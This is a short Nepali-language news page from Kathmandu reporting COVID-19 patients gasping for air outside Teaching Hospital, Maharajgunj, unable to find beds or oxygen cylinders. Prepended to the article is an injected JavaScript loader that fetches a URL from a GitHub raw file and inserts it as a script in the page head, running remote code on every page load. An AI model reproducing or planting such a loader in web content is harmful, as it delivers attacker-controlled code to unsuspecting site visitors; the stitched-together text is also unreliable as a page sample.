;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं
कोरोना कारण सास फेर्न गाह्रो भएर टिचिङ अस्पताल महारागन्ज काठमाडौंंको बाहिर बिरामीहरू छट्पटाई रहेका छन्।
अस्पतालमा वेड नपाएर आफ्नो जीवन बचाउनको लागि बाहिर प्यासेजमै अक्सिजन लिई रहेका छन् । अहिले अक्सिजनको सिलिन्डर नपाएर हाहाकार भइरहेका छ ।
फेसबुक प्रतिक्रियाहरु